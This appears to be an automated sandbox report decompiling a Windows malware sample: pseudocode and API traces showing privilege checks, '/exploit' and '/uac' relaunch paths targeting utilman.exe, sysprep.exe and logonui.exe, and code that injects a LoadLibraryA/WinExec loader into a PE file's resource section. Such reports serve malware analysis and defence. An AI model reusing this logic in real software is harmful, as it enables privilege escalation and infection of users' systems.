Part of subcall function 00DB1C33: GetLastError.KERNEL32(00000000,00000004,?,00000000), ref: 00DB1CC0
Part of subcall function 00DB1C33: CloseHandle.KERNEL32(00000000), ref: 00DB1CC7
Part of subcall function 00DB1C33: GetLastError.KERNEL32(00000004,?,00000000,?,?,00DB1FAF,00000000,00000000,00000000), ref: 00DB1CCC

Strings

Global\AtomFun, xrefs: 00DB1F69
sysprep.exe, xrefs: 00DB1F18
logonui.exe, xrefs: 00DB1EFB
utilman.exe, xrefs: 00DB1EDE

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: ErrorLast$Handle$CloseProcess$CurrentOpenTokenVersion$AuthorityCreateEventFirstInformationLocalModuleNextProcess32SnapshotThreadThread32Toolhelp32_strlen$AllocCountExitFileFreeNameSuspend_memset
String ID: Global\AtomFun$logonui.exe$sysprep.exe$utilman.exe
API String ID: 1416955679-3994176926
Opcode ID: 65f295e755ab49bfe224f478e3c94a4c31fc997efe8515d01b1ef77c04d21abc
Instruction ID: 4f84e35c8a1c1bfcf1da8db2309bf1bd0a0e4a8d5940f041171a214206c39252
Opcode Fuzzy Hash: 65f295e755ab49bfe224f478e3c94a4c31fc997efe8515d01b1ef77c04d21abc
Instruction Fuzzy Hash: 89215C7F904304EACB20BBB59D6EEEE37ACDF48390B944515B647D2145EB74C684CA30

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1CDA, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 140
sleepCOMMON

C-Code - Quality: 70%

			E00DB1CDA(void* __ecx) {
				void* __ebx;
				void* _t56;
				void* _t58;
				void* _t80;
				void* _t84;
				void* _t86;
				void* _t97;
				void* _t99;

				_t86 = __ecx;
				_t97 = _t99 - 0x78;
				_t84 = E00DB29C6();
				E00DB3510(_t97 - 0x40, 0, 0x9c);
				 *(_t97 - 0x40) = 0x9c;
				if(GetVersionExA(_t97 - 0x40) != 0) {
					L2:
					 *((intOrPtr*)(_t97 + 0x60)) = 0;
					if( *((intOrPtr*)(_t97 - 0x3c)) < 6) {
						L4:
						GetCommandLineA();
						_push(_t97 + 0x64);
						_push(_t97 + 0x68);
						_push(_t97 + 0x6c);
						_push(_t97 + 0x5c);
						 *((intOrPtr*)(_t97 + 0x5c)) = 0;
						 *((intOrPtr*)(_t97 + 0x6c)) = 0;
						 *((intOrPtr*)(_t97 + 0x68)) = 0;
						 *((intOrPtr*)(_t97 + 0x64)) = 0;
						_push(GetModuleHandleA(0));
						_t56 = E00DB2308(_t108);
						if(_t56 == 0) {
							L19:
							E00DB2481();
							L20:
							return 0;
						}
						if( *((intOrPtr*)(_t97 + 0x5c)) != 0 ||  *((intOrPtr*)(_t97 + 0x64)) != 0) {
							L17:
							_t58 = E00DB22DC(_t118);
							_t119 = _t58;
							if(_t58 == 0) {
								E00DB1434(_t119);
							}
							goto L19;
						} else {
							__imp__#680();
							if(_t56 != 0) {
								goto L17;
							}
							GetModuleFileNameA(GetModuleHandleA(0), _t97 - 0x144, 0x103);
							 *(_t97 + 0x74) = 0;
							 *((intOrPtr*)(_t97 + 0x70)) = 0;
							if(E00DB250C(_t86, _t97 - 0x144, _t97 + 0x74, _t97 + 0x70) != 0) {
								 *( *((intOrPtr*)( *(_t97 + 0x74) + 0x3c)) +  *(_t97 + 0x74) + 0x16) =  *( *((intOrPtr*)( *(_t97 + 0x74) + 0x3c)) +  *(_t97 + 0x74) + 0x16) | 0x00002000;
								if( *((intOrPtr*)(_t97 - 0x3c)) < 6 || _t84 == 0 &&  *((intOrPtr*)(_t97 + 0x6c)) == 0) {
									_push(_t97 - 0x144);
									_push("\"%s\" /exploit");
									_push(_t97 - 0x248);
									E00DB3E87();
									E00DB3143(__eflags,  *(_t97 + 0x74),  *((intOrPtr*)(_t97 + 0x70)), _t97 - 0x248);
								} else {
									if( *((intOrPtr*)(_t97 + 0x60)) < 0x3000) {
										_t118 =  *((intOrPtr*)(_t97 + 0x68));
										if( *((intOrPtr*)(_t97 + 0x68)) == 0) {
											_push(_t97 - 0x144);
											_push("\"%s\" /uac");
											_push(_t97 - 0x248);
											E00DB3E87();
											E00DB2BDC(_t84,  *(_t97 + 0x74),  *((intOrPtr*)(_t97 + 0x70)), _t97 - 0x248);
										}
									}
								}
								Sleep(0xbb8);
								LocalFree( *(_t97 + 0x74));
							}
							goto L17;
						}
					}
					_push(_t97 + 0x60);
					_push(GetCurrentProcess());
					_t80 = E00DB289C();
					_t108 = _t80;
					if(_t80 == 0) {
						goto L20;
					}
					goto L4;
				}
				 *(_t97 - 0x40) = 0x94;
				if(GetVersionExA(_t97 - 0x40) == 0) {
					goto L20;
				}
				goto L2;
			}

0x00db1cda
0x00db1cdb
0x00db1cf3
0x00db1cfc
0x00db1d07
0x00db1d15
0x00db1d2c
0x00db1d30
0x00db1d33
0x00db1d4d
0x00db1d4d
0x00db1d5c
0x00db1d60
0x00db1d64
0x00db1d68
0x00db1d6a
0x00db1d6d
0x00db1d70
0x00db1d73
0x00db1d78
0x00db1d79
0x00db1d80
0x00db1e8a
0x00db1e8a
0x00db1e8f
0x00db1e98
0x00db1e98
0x00db1d89
0x00db1e7c
0x00db1e7c
0x00db1e81
0x00db1e83
0x00db1e85
0x00db1e85
0x00000000
0x00db1d98
0x00db1d98
0x00db1da0
0x00000000
0x00000000
0x00db1db6
0x00db1dcb
0x00db1dce
0x00db1dd8
0x00db1deb
0x00db1df3
0x00db1e41
0x00db1e48
0x00db1e4d
0x00db1e4e
0x00db1e63
0x00db1dfe
0x00db1e05
0x00db1e07
0x00db1e0a
0x00db1e12
0x00db1e19
0x00db1e1e
0x00db1e1f
0x00db1e34
0x00db1e34
0x00db1e0a
0x00db1e05
0x00db1e6d
0x00db1e76
0x00db1e76
0x00000000
0x00db1dd8
0x00db1d89
0x00db1d38
0x00db1d3f
0x00db1d40
0x00db1d45
0x00db1d47
0x00000000
0x00000000
0x00000000
0x00db1d47
0x00db1d1b
0x00db1d26
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00DB29C6: _memset.LIBCMT ref: 00DB29E1
Part of subcall function 00DB29C6: GetVersionExA.KERNEL32(?,?,?), ref: 00DB29F0
Part of subcall function 00DB29C6: GetLastError.KERNEL32(?,?), ref: 00DB29FA
Part of subcall function 00DB29C6: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00DB2A24
Part of subcall function 00DB29C6: OpenProcessToken.ADVAPI32(00000000,?,?), ref: 00DB2A2B
Part of subcall function 00DB29C6: GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00DB2A51
Part of subcall function 00DB29C6: GetLastError.KERNEL32(?,?), ref: 00DB2A57
Part of subcall function 00DB29C6: CloseHandle.KERNEL32(?), ref: 00DB2A60
Part of subcall function 00DB29C6: GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00DB2A86
Part of subcall function 00DB29C6: CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?,?,?), ref: 00DB2A9E
Part of subcall function 00DB29C6: CheckTokenMembership.ADVAPI32(?,?,?,?,?), ref: 00DB2AB6
Part of subcall function 00DB29C6: GetLastError.KERNEL32(?,?), ref: 00DB2AC5
Part of subcall function 00DB29C6: CloseHandle.KERNEL32(?), ref: 00DB2ACE
Part of subcall function 00DB29C6: IsUserAnAdmin.SHELL32 ref: 00DB2AD2
Part of subcall function 00DB29C6: CloseHandle.KERNEL32(?), ref: 00DB2ADD
Part of subcall function 00DB29C6: GetLastError.KERNEL32(?,?), ref: 00DB2AE1
Part of subcall function 00DB29C6: IsUserAnAdmin.SHELL32 ref: 00DB2AEB

_memset.LIBCMT ref: 00DB1CFC
GetVersionExA.KERNEL32(?,?,?), ref: 00DB1D11
GetVersionExA.KERNEL32(?,?,?), ref: 00DB1D22
GetCurrentProcess.KERNEL32(?,?,?), ref: 00DB1D39

Part of subcall function 00DB289C: _memset.LIBCMT ref: 00DB28CA
Part of subcall function 00DB289C: GetVersionExA.KERNEL32(?,00000000,7622DF30,00000000), ref: 00DB28DF
Part of subcall function 00DB289C: GetVersionExA.KERNEL32(?), ref: 00DB28F0
Part of subcall function 00DB289C: OpenProcessToken.ADVAPI32(?,00000018,?), ref: 00DB290D
Part of subcall function 00DB289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00DB292F
Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB293B
Part of subcall function 00DB289C: LocalAlloc.KERNEL32(00000040,?), ref: 00DB2947
Part of subcall function 00DB289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00DB2960
Part of subcall function 00DB289C: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00DB2968
Part of subcall function 00DB289C: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00DB2978
Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB298B
Part of subcall function 00DB289C: LocalFree.KERNEL32(00000000), ref: 00DB2992
Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB299A
Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB299E
Part of subcall function 00DB289C: CloseHandle.KERNEL32(?), ref: 00DB29A7
Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB29AF

GetCommandLineA.KERNEL32(?,?), ref: 00DB1D4D
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?), ref: 00DB1D76

Part of subcall function 00DB2308: GetTickCount.KERNEL32 ref: 00DB2313
Part of subcall function 00DB2308: _memset.LIBCMT ref: 00DB2344
Part of subcall function 00DB2308: GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00DB2359
Part of subcall function 00DB2308: GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00DB236A
Part of subcall function 00DB2308: GetCommandLineW.KERNEL32(?,00000000,?,7622DAA3,00000000), ref: 00DB2392
Part of subcall function 00DB2308: CommandLineToArgvW.SHELL32(00000000), ref: 00DB2399
Part of subcall function 00DB2308: LocalFree.KERNEL32(00000000,00000000,?,7622DAA3,00000000), ref: 00DB2432

IsUserAnAdmin.SHELL32 ref: 00DB1D98
GetModuleHandleA.KERNEL32(00000000,?,00000103,?,?), ref: 00DB1DB3
GetModuleFileNameA.KERNEL32(00000000,?,?), ref: 00DB1DB6

Part of subcall function 00DB250C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DB2526
Part of subcall function 00DB250C: GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2536
Part of subcall function 00DB250C: LocalAlloc.KERNEL32(00000040,00000000,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2544
Part of subcall function 00DB250C: ReadFile.KERNEL32(00000000,00000000,00DB1DD6,?,00000000), ref: 00DB255F
Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2572
Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB257A
Part of subcall function 00DB250C: CloseHandle.KERNEL32(00000000), ref: 00DB2583
Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB258C

Part of subcall function 00DB2BDC: GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,00000000,7622DAA3), ref: 00DB2BFB
Part of subcall function 00DB2BDC: GetProcAddress.KERNEL32(00000000), ref: 00DB2C02
Part of subcall function 00DB2BDC: GetCurrentProcess.KERNEL32(?), ref: 00DB2C12
Part of subcall function 00DB2BDC: GetVersionExA.KERNEL32(?), ref: 00DB2C30
Part of subcall function 00DB2BDC: GetTempPathA.KERNEL32(00000104,?), ref: 00DB2C73
Part of subcall function 00DB2BDC: GetTickCount.KERNEL32 ref: 00DB2C75
Part of subcall function 00DB2BDC: _strlen.LIBCMT ref: 00DB2C88
Part of subcall function 00DB2BDC: wsprintfA.USER32 ref: 00DB2C96
Part of subcall function 00DB2BDC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00DB2CC2
Part of subcall function 00DB2BDC: GetTempPathA.KERNEL32(00000104,?), ref: 00DB2CE4
Part of subcall function 00DB2BDC: GetTempPathA.KERNEL32(00000104,?), ref: 00DB2D5E
Part of subcall function 00DB2BDC: DeleteFileA.KERNEL32(?), ref: 00DB2D7A
Part of subcall function 00DB2BDC: GetWindowsDirectoryA.KERNEL32(?,00000103,?), ref: 00DB2DBE
Part of subcall function 00DB2BDC: GetWindowsDirectoryA.KERNEL32(?,00000103), ref: 00DB2DDB
Part of subcall function 00DB2BDC: DeleteFileA.KERNEL32(?,?,?,?), ref: 00DB2E4B
Part of subcall function 00DB2BDC: DeleteFileA.KERNEL32(?,?), ref: 00DB2E54
Part of subcall function 00DB2BDC: LocalFree.KERNEL32(?,?,?,?,?,?,?,?), ref: 00DB2E59
Part of subcall function 00DB2BDC: DeleteFileA.KERNEL32(?,?,?,?), ref: 00DB2E66
Part of subcall function 00DB2BDC: DeleteFileA.KERNEL32(?), ref: 00DB2E6F
Part of subcall function 00DB2BDC: GetLastError.KERNEL32 ref: 00DB2E77

Part of subcall function 00DB3143: GetModuleHandleA.KERNEL32(00000000,00000000,7622DAA3,00000000), ref: 00DB315B
Part of subcall function 00DB3143: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00DB3173
Part of subcall function 00DB3143: GetTempPathA.KERNEL32(00000104,?), ref: 00DB31A5
Part of subcall function 00DB3143: GetTempPathA.KERNEL32(00000104,?), ref: 00DB31CD
Part of subcall function 00DB3143: GetTickCount.KERNEL32 ref: 00DB31CF
Part of subcall function 00DB3143: _strlen.LIBCMT ref: 00DB31E2
Part of subcall function 00DB3143: wsprintfA.USER32 ref: 00DB31F0
Part of subcall function 00DB3143: GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00DB3207
Part of subcall function 00DB3143: GetProcAddress.KERNEL32(00000000), ref: 00DB320A
Part of subcall function 00DB3143: GetCurrentProcess.KERNEL32(00000000), ref: 00DB321A
Part of subcall function 00DB3143: GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00DB3251
Part of subcall function 00DB3143: GetTempPathA.KERNEL32(00000104,?), ref: 00DB330F
Part of subcall function 00DB3143: GetTickCount.KERNEL32 ref: 00DB3311
Part of subcall function 00DB3143: _strlen.LIBCMT ref: 00DB3324
Part of subcall function 00DB3143: wsprintfA.USER32 ref: 00DB3332
Part of subcall function 00DB3143: MoveFileA.KERNEL32(?,?), ref: 00DB3349
Part of subcall function 00DB3143: LocalFree.KERNEL32(?,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB3384
Part of subcall function 00DB3143: GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00DB33D2
Part of subcall function 00DB3143: RegisterWindowMessageA.USER32(?,?), ref: 00DB341D
Part of subcall function 00DB3143: LockWorkStation.USER32 ref: 00DB343D
Part of subcall function 00DB3143: CreateEventA.KERNEL32(00000000,00000000,00000000,Global\AtomFun,00000055), ref: 00DB3456
Part of subcall function 00DB3143: GetLastError.KERNEL32 ref: 00DB3463
Part of subcall function 00DB3143: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00DB3471
Part of subcall function 00DB3143: CloseHandle.KERNEL32(00000000), ref: 00DB3485
Part of subcall function 00DB3143: GetTempPathA.KERNEL32(00000104,?), ref: 00DB3493
Part of subcall function 00DB3143: GetTickCount.KERNEL32 ref: 00DB3495
Part of subcall function 00DB3143: _strlen.LIBCMT ref: 00DB34A8
Part of subcall function 00DB3143: wsprintfA.USER32 ref: 00DB34B6
Part of subcall function 00DB3143: MoveFileA.KERNEL32(?,?), ref: 00DB34CD
Part of subcall function 00DB3143: CopyFileA.KERNEL32(?,?,00000000), ref: 00DB34DF

Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?), ref: 00DB1E6D
LocalFree.KERNEL32(?,?,?), ref: 00DB1E76

Part of subcall function 00DB22DC: GetLastError.KERNEL32(00000000,7622DAA3,00DB232C,00000000), ref: 00DB22EB
Part of subcall function 00DB22DC: CloseHandle.KERNEL32(00000000), ref: 00DB22FD

Part of subcall function 00DB1434: IsUserAnAdmin.SHELL32 ref: 00DB1435
Part of subcall function 00DB1434: GetLastError.KERNEL32(?,?), ref: 00DB1446
Part of subcall function 00DB1434: CloseHandle.KERNEL32(00000000), ref: 00DB145E

Part of subcall function 00DB2481: ExitProcess.KERNEL32 ref: 00DB24A3

Strings

"%s" /uac, xrefs: 00DB1E19
"%s" /exploit, xrefs: 00DB1E48

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: ErrorLast$Handle$File$CloseVersion$LocalPathProcessTempToken$CountModule$DeleteFreeTick$AdminCurrentDirectoryInformationUser_memset_strlenwsprintf$CommandCreateLineName$AddressAllocAuthorityClipboardFormatMoveOpenProcSystemWindows$ArgvCheckCopyEventExitKnownLockMembershipMessageObjectReadRegisterSingleSizeSleepStationWaitWellWindowWork
String ID: "%s" /exploit$"%s" /uac
API String ID: 1631179323-107240129
Opcode ID: fe49fdd2df998f167974c9b3d6aeccbdefb8fb28cc0e294fa7e0041c5cfc4634
Instruction ID: 6972e45aabfaa70fd3199a4ae166d4bdc6fd3e8d17d862c2187985e0bd20b4bb
Opcode Fuzzy Hash: fe49fdd2df998f167974c9b3d6aeccbdefb8fb28cc0e294fa7e0041c5cfc4634
Instruction Fuzzy Hash: F841057A900218DBDF21EFA5DC55AEE7BACEF44340F54022AF91AD2121EB34DA45CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2308, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 126
COMMON

C-Code - Quality: 100%

			E00DB2308(void* __eflags) {
				void* _t29;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				signed int _t38;
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t43;
				int _t45;
				void* _t47;
				void _t49;
				void _t50;
				void _t51;
				void _t52;
				signed int _t63;
				void* _t70;
				void* _t72;
				void* _t76;

				_t76 = __eflags;
				_t70 = _t72 - 0x64;
				E00DB2001(GetTickCount());
				 *0xdb5a00 =  *((intOrPtr*)(_t70 + 0x6c));
				if(E00DB22DC(_t76) == 0) {
					E00DB3510(_t70 - 0x3c, 0, 0x9c);
					 *(_t70 - 0x3c) = 0x9c;
					_t29 = GetVersionExA(_t70 - 0x3c);
					__eflags = _t29;
					if(_t29 != 0) {
						L4:
						__eflags =  *((intOrPtr*)(_t70 - 0x38)) - 5;
						if( *((intOrPtr*)(_t70 - 0x38)) != 5) {
							L6:
							__eflags =  *((intOrPtr*)(_t70 - 0x38)) - 6;
							if( *((intOrPtr*)(_t70 - 0x38)) >= 6) {
								L8:
								 *(_t70 + 0x60) =  *(_t70 + 0x60) & 0x00000000;
								_t47 = CommandLineToArgvW(GetCommandLineW(), _t70 + 0x60);
								__eflags = _t47;
								if(_t47 == 0) {
									L20:
									_t33 =  *(_t70 + 0x70);
									__eflags = _t33;
									if(_t33 != 0) {
										_t52 =  *0xdb5a04; // 0x0
										 *_t33 = _t52;
									}
									_t34 =  *(_t70 + 0x74);
									__eflags = _t34;
									if(_t34 != 0) {
										_t51 =  *0xdb5a08; // 0x0
										 *_t34 = _t51;
									}
									_t35 =  *(_t70 + 0x78);
									__eflags = _t35;
									if(_t35 != 0) {
										_t50 =  *0xdb5a0c; // 0x0
										 *_t35 = _t50;
									}
									_t36 =  *(_t70 + 0x7c);
									__eflags = _t36;
									if(_t36 != 0) {
										_t49 =  *0xdb5a10; // 0x0
										 *_t36 = _t49;
									}
									_t38 = 1;
									__eflags = 1;
									L29:
									goto L30;
								}
								_t63 = 1;
								__eflags =  *(_t70 + 0x60) - 1;
								if( *(_t70 + 0x60) <= 1) {
									L19:
									LocalFree(_t47);
									goto L20;
								} else {
									goto L10;
								}
								do {
									L10:
									_t69 = _t47 + _t63 * 4;
									_t40 = E00DB3A11( *(_t47 + _t63 * 4), L"/runmain");
									__eflags = _t40;
									if(_t40 != 0) {
										_t41 = E00DB3A11( *_t69, L"/exploit");
										__eflags = _t41;
										if(_t41 != 0) {
											_t42 = E00DB3A11( *_t69, L"/uac");
											__eflags = _t42;
											if(_t42 != 0) {
												_t43 = E00DB3A11( *_t69, L"/executable");
												__eflags = _t43;
												if(_t43 == 0) {
													 *0xdb5a10 = 1;
												}
											} else {
												 *0xdb5a0c = 1;
											}
										} else {
											 *0xdb5a08 = 1;
										}
									} else {
										 *0xdb5a04 = 1;
									}
									_t63 = _t63 + 1;
									__eflags = _t63 -  *(_t70 + 0x60);
								} while (_t63 <  *(_t70 + 0x60));
								goto L19;
							}
							L7:
							_t38 = 0;
							goto L29;
						}
						__eflags =  *((intOrPtr*)(_t70 - 0x34)) - 1;
						if( *((intOrPtr*)(_t70 - 0x34)) >= 1) {
							goto L8;
						}
						goto L6;
					}
					 *(_t70 - 0x3c) = 0x94;
					_t45 = GetVersionExA(_t70 - 0x3c);
					__eflags = _t45;
					if(_t45 == 0) {
						goto L7;
					}
					goto L4;
				} else {
					_t38 = 0;
					L30:
					return _t38;
				}
			}

0x00db2308
0x00db2309
0x00db231a
0x00db2322
0x00db232e
0x00db2344
0x00db234f
0x00db2359
0x00db235b
0x00db235d
0x00db2370
0x00db2370
0x00db2374
0x00db237c
0x00db237c
0x00db2380
0x00db2389
0x00db2389
0x00db239f
0x00db23a1
0x00db23a3
0x00db2439
0x00db2439
0x00db243d
0x00db243f
0x00db2441
0x00db2447
0x00db2447
0x00db2449
0x00db244c
0x00db244e
0x00db2450
0x00db2456
0x00db2456
0x00db2458
0x00db245b
0x00db245d
0x00db245f
0x00db2465
0x00db2465
0x00db2467
0x00db246a
0x00db246c
0x00db246e
0x00db2474
0x00db2474
0x00db2478
0x00db2478
0x00db2479
0x00000000
0x00db2479
0x00db23ac
0x00db23ad
0x00db23b0
0x00db2431
0x00db2432
0x00000000
0x00000000
0x00000000
0x00000000
0x00db23b2
0x00db23b2
0x00db23b2
0x00db23bc
0x00db23c3
0x00db23c5
0x00db23da
0x00db23e1
0x00db23e3
0x00db23f8
0x00db23ff
0x00db2401
0x00db2416
0x00db241d
0x00db241f
0x00db2421
0x00db2421
0x00db2403
0x00db2403
0x00db2403
0x00db23e5
0x00db23e5
0x00db23e5
0x00db23c7
0x00db23c7
0x00db23c7
0x00db242b
0x00db242c
0x00db242c
0x00000000
0x00db23b2
0x00db2382
0x00db2382
0x00000000
0x00db2382
0x00db2376
0x00db237a
0x00000000
0x00000000
0x00000000
0x00db237a
0x00db2363
0x00db236a
0x00db236c
0x00db236e
0x00000000
0x00000000
0x00000000
0x00db2330
0x00db2330
0x00db247a
0x00db247e
0x00db247e

APIs

GetTickCount.KERNEL32 ref: 00DB2313

Part of subcall function 00DB22DC: GetLastError.KERNEL32(00000000,7622DAA3,00DB232C,00000000), ref: 00DB22EB
Part of subcall function 00DB22DC: CloseHandle.KERNEL32(00000000), ref: 00DB22FD

_memset.LIBCMT ref: 00DB2344
GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00DB2359
GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00DB236A
GetCommandLineW.KERNEL32(?,00000000,?,7622DAA3,00000000), ref: 00DB2392
CommandLineToArgvW.SHELL32(00000000), ref: 00DB2399
LocalFree.KERNEL32(00000000,00000000,?,7622DAA3,00000000), ref: 00DB2432

Strings

/runmain, xrefs: 00DB23B5
/uac, xrefs: 00DB23F1
/exploit, xrefs: 00DB23D3
/executable, xrefs: 00DB240F

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: CommandLineVersion$ArgvCloseCountErrorFreeHandleLastLocalTick_memset
String ID: /executable$/exploit$/runmain$/uac
API String ID: 2049752164-780269054
Opcode ID: 2eb99ddcbfc499b806f895cbcdf6c1a7f74734d841fdfff8550f2c0566ca1f60
Instruction ID: 4e6c73f6066c829ded35f4f40664c9abfef4d7af5d255cc4a85df399c3c718bc
Opcode Fuzzy Hash: 2eb99ddcbfc499b806f895cbcdf6c1a7f74734d841fdfff8550f2c0566ca1f60
Instruction Fuzzy Hash: 3C418C36504349DBDB14AFA5EC95BE937E8FB15350F180629E843E7664EB74E844CB30

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2F02, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 106
libraryloaderfileCOMMON

C-Code - Quality: 91%

			E00DB2F02(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				void* _t50;
				void* _t66;
				char* _t72;
				void* _t78;
				signed int _t80;
				intOrPtr* _t82;
				void* _t87;

				_v16 = 0xdb2f01;
				_t50 = E00DB20EC(_a12);
				_v8 = _v8 & 0x00000000;
				_v12 = _t50 + 0xdb2f01 - E00DB2E88 + 0x111;
				_t87 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_t80 =  *(_t87 + 6) & 0x0000ffff;
				_t78 = ( *(_t87 + 0x14) & 0x0000ffff) + _t87 + 0x18;
				if(_t80 == 0) {
					L11:
					return 1;
				}
				while(E00DB214C(_t78, ".rsrc", 5) != 0) {
					_t78 = _t78 + 0x28;
					_v8 = _v8 + 1;
					if(_v8 < _t80) {
						continue;
					}
					goto L11;
				}
				if( *((intOrPtr*)(_t78 + 0x10)) >= _v12) {
					_t82 =  *((intOrPtr*)(_t78 + 0x14)) + _a4;
					E00DB20CE(_t82, 0, 0x110);
					 *((intOrPtr*)(_t82 + 8)) =  *((intOrPtr*)(_t87 + 0x28));
					 *_t82 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
					 *((intOrPtr*)(_t82 + 4)) = GetProcAddress(GetModuleHandleA("kernel32.dll"), "WinExec");
					if(_a16 != 0) {
						E00DB2194(_t82 + 0xc, _a16);
					}
					E00DB2194(_t82 + 0x110, _a12);
					_t66 = E00DB20EC(_a12);
					_t32 = _t82 + 0x111; // 0x111
					E00DB20AE(_t66 + _t32, E00DB2E88, _v16);
					 *((intOrPtr*)(_t87 + 0x28)) = E00DB20EC(_a12) +  *((intOrPtr*)(_t78 + 0xc)) + 0x111;
					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x20000000;
					 *((intOrPtr*)(_t87 + 0x88)) = 0;
					 *((intOrPtr*)(_t87 + 0x8c)) = 0;
					_v12 = 0;
					_v8 = 0;
					_t72 =  &_v12;
					__imp__CheckSumMappedFile(_a4, _a8, _t72,  &_v8);
					if(_t72 == 0) {
						GetLastError();
					} else {
						 *(_t87 + 0x58) = _v8;
					}
					goto L11;
				}
				return 0;
			}

0x00db2f19
0x00db2f1c
0x00db2f21
0x00db2f2c
0x00db2f35
0x00db2f37
0x00db2f3f
0x00db2f45
0x00db305b
0x00000000
0x00db305d
0x00db2f4b
0x00db2f5c
0x00db2f5f
0x00db2f65
0x00000000
0x00000000
0x00000000
0x00db2f67
0x00db2f72
0x00db2f7e
0x00db2f89
0x00db2f9b
0x00db2fb5
0x00db2fc8
0x00db2fcb
0x00db2fd4
0x00db2fd4
0x00db2fe3
0x00db2feb
0x00db2ff3
0x00db3000
0x00db3017
0x00db301a
0x00db3023
0x00db3029
0x00db302f
0x00db3032
0x00db3039
0x00db3043
0x00db304b
0x00db3055
0x00db304d
0x00db3050
0x00db3050
0x00000000
0x00db304b
0x00000000

APIs

Part of subcall function 00DB20CE: _memset.LIBCMT ref: 00DB20E1

GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA,?,00000000,00000110,?,.rsrc,00000005,76248354,0000C002,00000104,76248354,?,?), ref: 00DB2F9E
GetProcAddress.KERNEL32(00000000), ref: 00DB2FA5
GetModuleHandleA.KERNEL32(kernel32.dll,WinExec), ref: 00DB2FB7
GetProcAddress.KERNEL32(00000000), ref: 00DB2FBE
CheckSumMappedFile.IMAGEHLP(?,?,?,00000000,?,00000111,00DB2E88,?,?,?,?), ref: 00DB3043
GetLastError.KERNEL32 ref: 00DB3055

Strings

kernel32.dll, xrefs: 00DB2F96, 00DB2FB0
LoadLibraryA, xrefs: 00DB2F91
.rsrc, xrefs: 00DB2F4D
WinExec, xrefs: 00DB2FAB

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
